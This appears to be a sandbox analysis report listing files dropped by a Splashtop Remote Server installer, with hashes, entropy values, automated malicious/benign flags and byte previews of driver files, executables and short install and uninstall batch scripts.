                                                                                                                                                                                                                                                                                                                                  Size (bytes):18559
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.313796375225627
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:5eNwo6RK7Nm4UN1d08JN77hhOd5wTRK7Nm4UhkX88JN77hhOmT:Yw1n33hsd5wFIXf3hsmT
                                                                                                                                                                                                                                                                                                                                  MD5:3BEB01DAE131D8E2F595EA697676FD82
                                                                                                                                                                                                                                                                                                                                  SHA1:E4AE36B125E40E3964C176FAD1A2690317574A15
                                                                                                                                                                                                                                                                                                                                  SHA-256:B2E42C84B27299C6973FC976FF22837D156788A6D423286816DD9B551A959245
                                                                                                                                                                                                                                                                                                                                  SHA-512:DDCEB2EE00865574863F4E6D5CE32A4363FCBC85C42B75AE348FA1A09E1FC5284355A772E127372993560CA634B52447EE6F4CF7261691EB8EEDD0DD95731FEC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.H{..*.H........Hl0.Hh...1.0...+......0.. ..+.....7......0...0...+.....7.....]....qF.3o...!...210826123955Z0...+.....7.....0...0....R2.2.8.8.7.7.B.7.3.E.F.1.0.A.0.A.F.7.3.6.9.3.F.B.2.B.4.F.4.9.F.D.6.D.A.7.4.0.4.9...1..I08..+.....7...1*0(...F.i.l.e........s.t.v.s.p.k...i.n.f...0E..+.....7...17050...+.....7.......0!0...+........".w.>....6..+OI.m.@I0b..+.....7...1T0R...O.S.A.t.t.r.......<2.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1.,.2.:.6...2...0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R3.7.8.B.6.D.B.1.6.A.4.1.D.7.F.6.F.1.2.A.D.5.B.B.3.B.3.4.2.D.F.D.9.E.A.0.2.A.8.1...1..Q08..+.....7...1*0(...F.i.l.e........s.t.v.s.p.k...s.y.s...0M..+.....7...1?0=0...+.....7...0...........0!0...+........7.m.jA...*.;4-...*.0b..+.....7...1T0R...O.S.A.t.t.r.......<2.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1.,.2.:.6...2...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R4.C.C.A.0.5.0.E

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\stvspk.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4530
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.531167619033096
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:TMuJlJjPHHXkP9bYxHJswZ4xNzp49RY8MMCuqx:TMuFDHX4yR4xNdezqx
                                                                                                                                                                                                                                                                                                                                  MD5:C6F9A3971989361505A22B26F16CBF33
                                                                                                                                                                                                                                                                                                                                  SHA1:228877B73EF10A0AF73693FB2B4F49FD6DA74049
                                                                                                                                                                                                                                                                                                                                  SHA-256:1D08A49A629D67FDC77E6EC38B90F10A2C7788BDE9EDE15075732DA010FCE8DB
                                                                                                                                                                                                                                                                                                                                  SHA-512:B49317454756DD29317838224D2B49A1D4CDB358B0BAE5EFBD6CD7F12CDEE018BF9F3A8D7D1484D64BA158821E3EBDC52D18BD601D999FFB9127A744BD477A3C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature = "$CHICAGO$"..Class = MEDIA..Provider = %ST%..ClassGUID = {4d36e96c-e325-11ce-bfc1-08002be10318}..DriverVer=08/26/2021,1.0.1.0..CatalogFile = stvspk.cat....[SourceDisksNames.x86]..222 = "STVSpk Driver Disk","",222,\32bits....[SourceDisksNames.amd64]..222 = "STVSpk Driver Disk","",222,\64bits....[SourceDisksFiles]..stvspk.sys = 222....;;This syntax is only recognized on Windows XP and above- it is needed to install 64-bit drivers on..;;Windows Server 2003 Service Pack 1 and above.....[Manufacturer]..%MfgName% = SplashtopDS, NTAMD64, NTx86....;; For Windows Server 2003 Service Pack 1 and above, a 64-bit OS will not install a driver..;; unless the Manufacturer and Models Sections explicitly show it is a driver for that platform..;; But the individual model section decorations (or lack thereof) work as they always have...;; All of the model sections referred to are undecorated or NT-decorated, hence work on all platforms....[SplashtopDS]..%STVSpk.DeviceDesc%=STVSp

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\uninstall_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):202
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.8854882526314825
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd94wqJ6dA3OdqA3PMOdyE23PMmfPP07:kWH9dAedNtdyE23rH07
                                                                                                                                                                                                                                                                                                                                  MD5:3535AC984A69ED2E778B7F2B77618C94
                                                                                                                                                                                                                                                                                                                                  SHA1:3B6B19524DFAABDA5CF5FD2DD476A0108C928676
                                                                                                                                                                                                                                                                                                                                  SHA-256:98040E1CF91AB05E0341BAE64F1D8AD29077A5351C586F2507CFF4C41CA80A1C
                                                                                                                                                                                                                                                                                                                                  SHA-512:FD92393595D39F6260BB517DF38E82FBAB7BD7A9A79C276DEAFBDC69B123359F3D20C5A5B28AB06EFCB412E64E2AC940FA84FB130EAE9ACC778410119E7BF083
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\SRUtility.exe -u...\utils\devcon.exe remove *STVSpkSimple >> inst.log...\utils\devcon.exe rescan >> inst.log...\utils\DIFxCmd.exe /u stvspk.inf >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\uninstall_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.961978816753448
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd94wqJ6dA3OdRLiA3PMOdRLKE23PMmBPP07:kWH9dAedDtd0E239H07
                                                                                                                                                                                                                                                                                                                                  MD5:754E73406288B7E24396DE0B02C9767D
                                                                                                                                                                                                                                                                                                                                  SHA1:EE115F24C025725D5BC56DAF460CBB25084D1059
                                                                                                                                                                                                                                                                                                                                  SHA-256:A2B082F8CF5944558CA68BEEC0290C49A3E4080E3B364A9A64F6CC203DFD2339
                                                                                                                                                                                                                                                                                                                                  SHA-512:9C378936BE40F532C0866713417DC0F686F8067EE706AD96DC71BA9614378A9ACF1E481C95E25C0AA0C9E63CC23C237FAAB22E49BD773E138543F27C7F0AEA5E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\SRUtility.exe -u...\utils\devcon64.exe remove *STVSpkSimple >> inst.log...\utils\devcon64.exe rescan >> inst.log...\utils\DIFxCmd64.exe /u stvspk.inf >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\DIFxCmd.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jp.....V...V...V.ivV...V.igV...V.iaV...V...V&..V.iqV...V.icV...VRich...V........PE..L....zZP.............................#.......0...............................P............@...... ..........................d(..P............................@..l.......................................@............................................text............................... ..`.data...x....0......."..............@....reloc.......@.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\DIFxCmd64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................................................Rich....................PE..d....vZP.........."...... ..........(%.......................................`.......`....@.......... ......................................4+..P............@...............P......p...................................................8............................text............ .................. ..`.data........0.......$..............@....pdata.......@.......&..............@..@.reloc..8....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\devcon.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."..."....."......"......"...#.S."....."..`\..."......"......".Rich..".................PE..L...#.pK.................l..........Td.......................................P............@...... ..........................lm..........p....................@...... ...............................0...@............................................text... j.......l.................. ..`.data...4............p..............@....rsrc...p............v..............@..@.reloc.......@.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\devcon64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9...AF..9...AW..9...A@..9...9..f9...AP.9...AY..9.......9...AG..9...AB..9..Rich.9..........................PE..d.....pK.........."......~...........s.......................................p......|.....@.......... ......................................X}..........p.......T............`......0................................................................................text....|.......~.................. ..`.data...x...........................@....pdata..T...........................@..@.rsrc...p...........................@..@.reloc..p....`.......>..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stmirror.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.182836790970066
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:RnmRA8diIqFr2hrkzbBglwb20HsOANRBUBR+uekbnYPLGKw:5183HrkXBhb2CI7BUBUnCtKw
                                                                                                                                                                                                                                                                                                                                  MD5:3C0B8DA5253B68665362881787681D04
                                                                                                                                                                                                                                                                                                                                  SHA1:8C2925071EBBB1D94B34DBC9B926CC96F3D6674F
                                                                                                                                                                                                                                                                                                                                  SHA-256:8DB1AF7E90197353FD346A2A4D60C7EACD506EBD593A9BCA811DC9C5D420E141
                                                                                                                                                                                                                                                                                                                                  SHA-512:5ED6163BD09A81D50059B816B3D188DDABA7F032C091CD21205F081CA1B4BB902129A5AA87ADF55B5910B193721226F2E82CC53D9A0DF0D833933F798FCF5471
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!v.!v.!v.(.T.$v.!v.2v.(.R.#v.(.D."v.(.N."v.(.S. v.(.V. v.Rich!v.........PE..d...).9S.........." .....$..."....... ..............................................T........................................................p..<.......X....`.......J..........8....0...............................................0...............................text............ .................. ..h.rdata..<....0.......$..............@..H.data........@.......(..............@....pdata.......`.......<..............@..HINIT....T....p.......>.............. ....rsrc...X............B..............@..B.reloc...............H..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stmirror.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.164676951334965
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:C1XYhWsmdZunYe+PjPGr9ZCApkT1rrZgjldrXa+v5lPr9/6onc:CBYhWsmdknYPL/p1P6j7rtc
                                                                                                                                                                                                                                                                                                                                  MD5:1A2D1119C830079A91FDB0BC96C68E9F
                                                                                                                                                                                                                                                                                                                                  SHA1:6DFD2D9E82F5ABF807402E81F837DEA3FBF24861
                                                                                                                                                                                                                                                                                                                                  SHA-256:758732573D0360444173A9ADFEBC41E6295262A2E128F4A7DA973138BD05E1A6
                                                                                                                                                                                                                                                                                                                                  SHA-512:B8A8F0D970D4ACA797C3AE4F70C32D1068599F1FD802430F75606541F00BCC133B66484DAB0276115E09E39126AC398D54933A7757E4C28EC54FC0E40B869A3C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k..k..k..j..k......k......k.....k.....k......k......k.Rich.k.........................PE..d...).9S..........".................dP.......................................p.......R.......................................................P..<....`.......@..$...................0 ............................................... ..(............................text...`........................... ..h.rdata....... ......................@..H.data........0......................@....pdata..$....@......................@..HINIT....@....P...................... ....rsrc........`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stvideo.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18384
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.784225074424451
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KNpdeIDggm1TgXu0HM9CZFuz9ynYPLGKsH:Kp0f1Tg+CM9COZytKU
                                                                                                                                                                                                                                                                                                                                  MD5:FFF61014618EB5B63F5CBB7457537577
                                                                                                                                                                                                                                                                                                                                  SHA1:E899E392E493F731B900B36FF3C6AD384D35B129
                                                                                                                                                                                                                                                                                                                                  SHA-256:764FFF366A21B3D44F3F43BDED347E8BF6ACAEC3F911AEA07555A3D8E26CB407
                                                                                                                                                                                                                                                                                                                                  SHA-512:E057FC69EBE9E36A8D4DABD23044229450FA606564F28A566233AB014C7433ED515AC0BAE8427E667164518A92F74803719A1DB0066AF17560423C8E6BB6FA9B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i...h...i.......i.....i.....i.......i.......i.Rich..i.................PE..d...).9S.........." .........:..................................................................................................................<.......P....p.......0..........<....0...............................................0...............................text... ........................... ..h.rdata..\....0......................@..H.data....+...@......................@....pdata.......p......."..............@..HINIT.................$.............. ....rsrc...P............(..............@..B.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stvideo.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1656019250857135
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:C1XVhWcj2sFnYe+PjPGr9ZCApkT1rrZgjldrXa+v5lPr9SPp94v:CBVhWcj2onYPL/p1P6j7rLv
                                                                                                                                                                                                                                                                                                                                  MD5:8A12125138A8F34F9700529363947D5E
                                                                                                                                                                                                                                                                                                                                  SHA1:996729B5B9A1E85F3B911911AF675C51549F6D13
                                                                                                                                                                                                                                                                                                                                  SHA-256:392811F93E8DC4BD0BAEEF0DEDC6879DB667EAC0BE894BC6FBCF5BBB776AC98F
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7AE1C133B9660B791373F1D3BD6765207E6FC1D132687CCE99E267E4945CB9843A47FE53FF0C2A2F20C704F50A8F129514F56675B52FB2C354FC1D829EA62D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k..k..k..j..k......k......k.....k.....k......k......k.Rich.k.........................PE..d...).9S..........".................dP.......................................p..............................................................P..<....`.......@..$...................0 ............................................... ..(............................text...`........................... ..h.rdata....... ......................@..H.data........0......................@....pdata..$....@......................@..HINIT....@....P...................... ....rsrc........`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\install.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.239902792442837
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Eyd/MLVLV5rxk6BzX:EydELVLrqM7
                                                                                                                                                                                                                                                                                                                                  MD5:F03B61C1BE8851BF64E2EB97D4A3AF85
                                                                                                                                                                                                                                                                                                                                  SHA1:FE502F4ECD1209B3DADA7AC8F4876ED9FB5264E8
                                                                                                                                                                                                                                                                                                                                  SHA-256:AF5EFC928B43A1A476BEAFC055B19568EBCEE29EF4CEB211353DD218689F833B
                                                                                                                                                                                                                                                                                                                                  SHA-512:D229E472C0FAC83B5B952D368444DDCAC0DB965D033F29AC9EAB8F55D256BC4BFAB0861F21045A6E3B809F5B76AC30917AF321B3DC5F901F982CF477578ABD34
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:utils\devcon.exe install stvideo.inf STVideo_Driver

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\installWin7.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.625480821115634
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:EydKiRgLV5rxk6BzJzIvXYRABAC:EydOLrqMqPYRkAC
                                                                                                                                                                                                                                                                                                                                  MD5:70271842A0F3305F9A2922EFE95FBED0
                                                                                                                                                                                                                                                                                                                                  SHA1:8B60A48D3F3CE9BF397B586F88087A291DBE3B89
                                                                                                                                                                                                                                                                                                                                  SHA-256:A537CF622B5DBAD19587CBC8FE08BBCE8BFE7E49497BECA5784723E876F99415
                                                                                                                                                                                                                                                                                                                                  SHA-512:B84A1FE296A36346C9658F1A715114FE5A7518FC1E9B9C7A4D08DDFED760ED15626FCD1751EE361CE2D91FA9B19B75873BAA6ED1BB441BB5170DB50473FC2CD0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:utils\devcon install stvideo.inf STVideo_Driver_WIN7..utils\Mirror2Extend.exe

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\installWin7_64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):79
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7040270721314865
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:EydRFMyEJLV5rxk6BzJzIvXYRABAC:EydRFYJLrqMqPYRkAC
                                                                                                                                                                                                                                                                                                                                  MD5:C8D6ACDAF26E7B8FDAF2888E0CAE6275
                                                                                                                                                                                                                                                                                                                                  SHA1:B46AF328CF18FA3687AE4D9EE06780C21A12B7D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:DE19F496F5932135FB25AB04EEE9E5A923728DDFBE13499058530239D890240D
                                                                                                                                                                                                                                                                                                                                  SHA-512:79CF0BEDCB07C72B6FFF243F7B6D90116AF1E558290E873863C5BE6994ECB6A7E4D4A0ED33CB05D0AC3699CD2328B3E4613868DECB77D7B0BBA6CF49AD809067
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:utils\devcon64 install stvideo.inf STVideo_Driver_WIN7..utils\Mirror2Extend.exe

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stmirror.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.364902287777804
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:NpXpb9ygWK86AclLjQ/WzRf8aMKnqPndtQrcaceJe0uqmnYe+PjPGyz/wa4/h:59yD6nlLoWB8a5Od+zcuebZnYPLGK5a
                                                                                                                                                                                                                                                                                                                                  MD5:FD3381A69042E1B01266549549845449
